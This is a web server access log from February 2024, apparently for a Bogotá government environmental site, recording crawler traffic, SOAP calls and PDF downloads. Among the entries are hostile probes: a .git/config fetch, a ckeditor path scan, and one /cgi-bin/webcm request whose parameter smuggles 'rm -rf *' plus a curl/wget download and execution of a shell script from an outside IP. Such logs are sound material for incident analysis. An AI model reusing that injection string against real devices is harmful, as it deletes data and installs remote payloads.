201.245.192.253 - - [23/Feb/2024:03:40:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38995
201.245.192.253 - - [23/Feb/2024:03:40:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37578
201.245.192.253 - - [23/Feb/2024:03:40:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37755
201.245.192.253 - - [23/Feb/2024:03:41:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37578
199.16.157.180 - - [23/Feb/2024:03:41:33 -0500] "GET /images/cr%C3%B3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [23/Feb/2024:03:42:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [23/Feb/2024:03:42:21 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Feb/2024:03:42:23 -0500] "GET /robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [23/Feb/2024:03:43:03 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8397
52.70.240.171 - - [23/Feb/2024:03:43:26 -0500] "GET /BLA/resoluciones/AUTOS%202002/1544.pdf HTTP/1.1" 200 827699
172.22.2.4 - - [23/Feb/2024:03:41:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2024:03:44:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [23/Feb/2024:03:42:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52783
172.22.2.4 - - [23/Feb/2024:03:45:21 -0500] "GET /BLA/boletinlegal/documentos-importantes.php HTTP/1.1" 200 4883
172.22.2.4 - - [23/Feb/2024:03:45:23 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [23/Feb/2024:03:45:25 -0500] "GET /BLA/boletinlegal/ads.txt HTTP/1.1" 404 1037
172.22.2.4 - - [23/Feb/2024:03:44:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53195
201.245.192.253 - - [23/Feb/2024:03:46:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.20 - - [23/Feb/2024:03:46:12 -0500] "GET /sitemap.xml.gz HTTP/1.1" 404 1018
116.203.44.248 - - [23/Feb/2024:03:47:07 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [23/Feb/2024:03:47:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2024:03:48:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.20 - - [23/Feb/2024:03:49:12 -0500] "GET /BLA/resoluciones/AUTOS%202019/5529.pdf HTTP/1.1" 304 -
172.22.2.4 - - [23/Feb/2024:03:47:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.31.79.41 - - [23/Feb/2024:03:49:54 -0500] "GET /guadalupe-aguanoso-y-otros-senderos-disponibles-para-el-disfrute-de-los-ciudadanos.html?fbclid=IwAR0RBkiDmj5eRDrQD6F9zCsyZEBDtxZnE6OmhJa3vvvz-JQ6U2lPJ0NP868_aem_AbtI3kuc2sECaKndUD59g1cxiogC-IKjSes_stisrYYcyTD6A-TfUeTzR3GmA6CMYxo HTTP/1.1" 200 873
201.245.192.253 - - [23/Feb/2024:03:50:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [23/Feb/2024:03:48:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
66.249.77.9 - - [23/Feb/2024:03:51:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0506.pdf HTTP/1.1" 200 352855
17.241.219.167 - - [23/Feb/2024:03:51:59 -0500] "GET /secretaria-de-ambiente-libera-gavilan-y-otras-aves-silvestres-en-los-cerros-orientales.html HTTP/1.1" 200 854
201.245.192.253 - - [23/Feb/2024:03:52:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [23/Feb/2024:03:52:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2024:03:54:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.54 - - [23/Feb/2024:03:54:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4106.pdf HTTP/1.1" 304 -
172.22.2.4 - - [23/Feb/2024:03:53:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2024:03:54:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [23/Feb/2024:03:56:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [23/Feb/2024:03:57:20 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1038
216.245.221.92 - - [23/Feb/2024:03:57:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2024:03:58:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [23/Feb/2024:04:00:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [23/Feb/2024:03:59:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2024:04:00:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53818
66.249.77.9 - - [23/Feb/2024:04:01:59 -0500] "GET /resoluciones/RESOLUCIONES%202009/1267.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [23/Feb/2024:04:02:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [23/Feb/2024:04:02:21 -0500] "HEAD / HTTP/1.1" 200 -
111.113.89.43 - - [23/Feb/2024:04:02:47 -0500] "GET / HTTP/1.1" 200 319
123.245.85.140 - - [23/Feb/2024:04:02:49 -0500] "\x16\x03\x01" 400 226
111.113.89.97 - - [23/Feb/2024:04:02:49 -0500] "\x16\x03\x01" 400 226
61.52.72.50 - - [23/Feb/2024:04:02:59 -0500] "USER anonymous" 400 946
168.119.253.11 - - [23/Feb/2024:04:03:18 -0500] "GET / HTTP/1.1" 200 4720
40.77.167.73 - - [23/Feb/2024:04:04:00 -0500] "GET /portaldeninos/?s=2024 HTTP/1.1" 200 85855
201.245.192.253 - - [23/Feb/2024:04:04:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [23/Feb/2024:04:05:54 -0500] "GET /BLA/resoluciones/AUTOS%202023/2257.pdf HTTP/1.1" 200 516088
52.70.240.171 - - [23/Feb/2024:04:05:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 200 370932
181.78.209.202 - - [23/Feb/2024:04:05:56 -0500] "GET /guadalupe-aguanoso-y-otros-senderos-disponibles-para-el-disfrute-de-los-ciudadanos.html?fbclid=IwAR2xr2gMQ_ujrbOcMOzwuJtMfa9f6IqOjIcFUHbaH0xfOdP8srP8oSoNnGY HTTP/1.1" 200 873
201.245.192.253 - - [23/Feb/2024:04:06:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [23/Feb/2024:04:06:25 -0500] "GET /BLA/resoluciones/AUTOS%202023/2960.pdf HTTP/1.1" 200 387032
172.22.2.4 - - [23/Feb/2024:04:05:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [23/Feb/2024:04:07:21 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2024:04:06:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53818
201.245.192.253 - - [23/Feb/2024:04:08:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [23/Feb/2024:04:10:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
17.241.75.207 - - [23/Feb/2024:04:10:21 -0500] "GET /bogota-construccion-sostenible-reconocio-los-disenos-de-proyectos-constructivos-que-generaran-un-impacto-positivo-al-ambiente-en-la-ciudad.html HTTP/1.1" 200 872
66.249.77.10 - - [23/Feb/2024:04:10:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 200 370932
216.244.66.195 - - [23/Feb/2024:04:11:57 -0500] "GET /BLA/resoluciones/AUTOS%202023/1681.pdf HTTP/1.1" 200 404486
201.245.192.253 - - [23/Feb/2024:04:12:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [23/Feb/2024:04:12:21 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2024:04:11:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2024:04:11:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
181.55.143.239 - - [23/Feb/2024:04:14:01 -0500] "GET /guadalupe-aguanoso-y-otros-senderos-disponibles-para-el-disfrute-de-los-ciudadanos.html?fbclid=IwAR2g5hb8naAaO0jU71fj5x6LcQVMVFMycJP59vbFqQQt4OcN-v4neRCKgyo HTTP/1.1" 200 873
201.245.192.253 - - [23/Feb/2024:04:14:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [23/Feb/2024:04:15:58 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 304 -
185.224.128.200 - - [23/Feb/2024:04:16:00 -0500] "GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20rm%20-rf%20*;%20cd%20/tmp;%20curl%20-O%20http://107.175.3.29/wtf.sh;wget%20http://107.175.3.29/wtf.sh;%20chmod%20777%20wtf.sh;%20./wtf.sh%20%26 HTTP/1.1" 404 1018
201.245.192.253 - - [23/Feb/2024:04:16:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [23/Feb/2024:04:17:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2024:04:18:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [23/Feb/2024:04:16:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.191 - - [23/Feb/2024:04:19:12 -0500] "GET /Publicaciones/2023EE257963.pdf HTTP/1.1" 404 228
172.22.2.4 - - [23/Feb/2024:04:17:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
162.55.175.141 - - [23/Feb/2024:04:20:03 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [23/Feb/2024:04:20:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [23/Feb/2024:04:20:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39000
201.245.192.253 - - [23/Feb/2024:04:20:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37557
201.245.192.253 - - [23/Feb/2024:04:20:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37581
201.245.192.253 - - [23/Feb/2024:04:21:02 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [23/Feb/2024:04:21:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37557
17.241.227.66 - - [23/Feb/2024:04:21:59 -0500] "GET /senderos-en-los-cerros-orientales-cerrados-temporalmente-por-incendios-forestales.html HTTP/1.1" 200 991
201.245.192.253 - - [23/Feb/2024:04:22:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [23/Feb/2024:04:22:21 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.219 - - [23/Feb/2024:04:23:25 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES+2023%2F HTTP/1.1" 200 44575
201.245.192.253 - - [23/Feb/2024:04:24:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [23/Feb/2024:04:22:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2024:04:23:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [23/Feb/2024:04:26:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
157.55.39.60 - - [23/Feb/2024:04:27:07 -0500] "GET /conoce-el-proyecto-de-resolucion-para-la-formulacion-del-plan-institucional-de-gestion-ambiental-piga.html HTTP/1.1" 200 749
216.245.221.92 - - [23/Feb/2024:04:27:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2024:04:28:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.20 - - [23/Feb/2024:04:28:13 -0500] "GET /BLA/resoluciones/AUTOS%202014/5971.pdf HTTP/1.1" 304 -
52.167.144.198 - - [23/Feb/2024:04:29:14 -0500] "GET /Publicaciones/2024EE29470.pdf HTTP/1.1" 404 227
69.63.184.11 - - [23/Feb/2024:04:29:34 -0500] "GET /animales-recuperados-en-san-cristobal-y-ciudad-bolivar-son-atendidos-en-el-centro-de-flora-de-la-secretaria-de-ambiente.html HTTP/1.1" 200 1056
191.104.125.227 - - [23/Feb/2024:04:29:39 -0500] "GET /guadalupe-aguanoso-y-otros-senderos-disponibles-para-el-disfrute-de-los-ciudadanos.html?fbclid=IwAR30ZtGMpNNNrrOrgJ8E60FWg7Kr8dI4886z9gRTp-6dMm_jDnyRFoW0Ezw HTTP/1.1" 200 873
201.245.192.253 - - [23/Feb/2024:04:30:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [23/Feb/2024:04:28:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2024:04:30:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39000
201.245.192.253 - - [23/Feb/2024:04:30:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37557
201.245.192.253 - - [23/Feb/2024:04:30:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37581
172.22.2.4 - - [23/Feb/2024:04:29:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53818
201.245.192.253 - - [23/Feb/2024:04:31:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37557
201.245.192.253 - - [23/Feb/2024:04:32:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [23/Feb/2024:04:32:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2024:04:34:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.70.240.171 - - [23/Feb/2024:04:35:18 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES HTTP/1.1" 404 1018
3.224.220.101 - - [23/Feb/2024:04:35:22 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4901.pdf HTTP/1.1" 200 362543
23.22.35.162 - - [23/Feb/2024:04:35:26 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4734.pdf HTTP/1.1" 200 384767
23.22.35.162 - - [23/Feb/2024:04:35:30 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4897.pdf HTTP/1.1" 200 312534
3.224.220.101 - - [23/Feb/2024:04:35:35 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5007.pdf HTTP/1.1" 200 531203
23.22.35.162 - - [23/Feb/2024:04:35:38 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202019/0579.pdf HTTP/1.1" 200 299586
52.70.240.171 - - [23/Feb/2024:04:35:42 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/6040.pdf HTTP/1.1" 200 1474387
23.22.35.162 - - [23/Feb/2024:04:35:46 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5281.pdf HTTP/1.1" 200 365785
23.22.35.162 - - [23/Feb/2024:04:35:50 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5891.pdf HTTP/1.1" 200 982003
23.22.35.162 - - [23/Feb/2024:04:35:55 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5838.pdf HTTP/1.1" 200 401147
3.224.220.101 - - [23/Feb/2024:04:35:58 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5882.pdf HTTP/1.1" 200 398616
172.22.2.4 - - [23/Feb/2024:04:34:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.224.220.101 - - [23/Feb/2024:04:36:02 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5827.pdf HTTP/1.1" 200 388800
185.180.143.71 - - [23/Feb/2024:04:36:05 -0500] "GET / HTTP/1.1" 200 319
23.22.35.162 - - [23/Feb/2024:04:36:06 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%201969/5832.pdf HTTP/1.1" 404 1018
185.180.143.71 - - [23/Feb/2024:04:36:06 -0500] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 1018
52.167.144.218 - - [23/Feb/2024:04:36:06 -0500] "GET /BLA/resoluciones/AUTOS%202020/0042.pdf HTTP/1.1" 200 407713
201.245.192.253 - - [23/Feb/2024:04:36:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
3.224.220.101 - - [23/Feb/2024:04:36:10 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5841.pdf HTTP/1.1" 200 387583
23.22.35.162 - - [23/Feb/2024:04:36:15 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4512.pdf HTTP/1.1" 200 390273
3.224.220.101 - - [23/Feb/2024:04:36:18 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/3870.pdf HTTP/1.1" 200 440868
23.22.35.162 - - [23/Feb/2024:04:36:21 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5202.pdf HTTP/1.1" 200 441441
23.22.35.162 - - [23/Feb/2024:04:36:27 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4121.pdf HTTP/1.1" 200 392112
23.22.35.162 - - [23/Feb/2024:04:36:31 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5930.pdf HTTP/1.1" 200 625749
52.70.240.171 - - [23/Feb/2024:04:36:34 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5101.pdf HTTP/1.1" 200 365380
23.22.35.162 - - [23/Feb/2024:04:36:39 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1201.pdf HTTP/1.1" 200 370202
52.70.240.171 - - [23/Feb/2024:04:36:42 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5800.pdf HTTP/1.1" 200 390545
3.224.220.101 - - [23/Feb/2024:04:36:46 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4419.pdf HTTP/1.1" 200 396644
52.70.240.171 - - [23/Feb/2024:04:36:50 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5919.pdf HTTP/1.1" 200 941933
172.22.2.4 - - [23/Feb/2024:04:35:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
52.70.240.171 - - [23/Feb/2024:04:36:54 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5774.pdf HTTP/1.1" 200 429236
3.224.220.101 - - [23/Feb/2024:04:36:58 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5897.pdf HTTP/1.1" 200 884447
52.70.240.171 - - [23/Feb/2024:04:37:02 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5205.pdf HTTP/1.1" 200 441441
23.22.35.162 - - [23/Feb/2024:04:37:06 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202022/5689.pdf HTTP/1.1" 200 344721
23.22.35.162 - - [23/Feb/2024:04:37:11 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS HTTP/1.1" 404 1018
3.224.220.101 - - [23/Feb/2024:04:37:14 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202019/0579.pdf HTTP/1.1" 200 299586
52.70.240.171 - - [23/Feb/2024:04:37:18 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/462.pdf HTTP/1.1" 200 435332
191.104.155.209 - - [23/Feb/2024:04:37:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:20 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
191.104.155.209 - - [23/Feb/2024:04:37:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:20 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
191.104.155.209 - - [23/Feb/2024:04:37:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:20 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
191.104.155.209 - - [23/Feb/2024:04:37:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:20 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
191.104.155.209 - - [23/Feb/2024:04:37:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:20 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
191.104.155.209 - - [23/Feb/2024:04:37:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:20 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
191.104.155.209 - - [23/Feb/2024:04:37:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:20 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
216.245.221.92 - - [23/Feb/2024:04:37:21 -0500] "HEAD / HTTP/1.1" 200 -
66.249.77.9 - - [23/Feb/2024:04:37:21 -0500] "GET /BLA/resoluciones/Autos%202008/0401.pdf HTTP/1.1" 200 113228
191.104.155.209 - - [23/Feb/2024:04:37:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:25 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
191.104.155.209 - - [23/Feb/2024:04:37:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:25 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
191.104.155.209 - - [23/Feb/2024:04:37:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:25 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
191.104.155.209 - - [23/Feb/2024:04:37:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:25 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
191.104.155.209 - - [23/Feb/2024:04:37:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:25 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
191.104.155.209 - - [23/Feb/2024:04:37:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:25 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
191.104.155.209 - - [23/Feb/2024:04:37:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:25 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
191.104.155.209 - - [23/Feb/2024:04:37:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
191.104.155.209 - - [23/Feb/2024:04:37:29 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
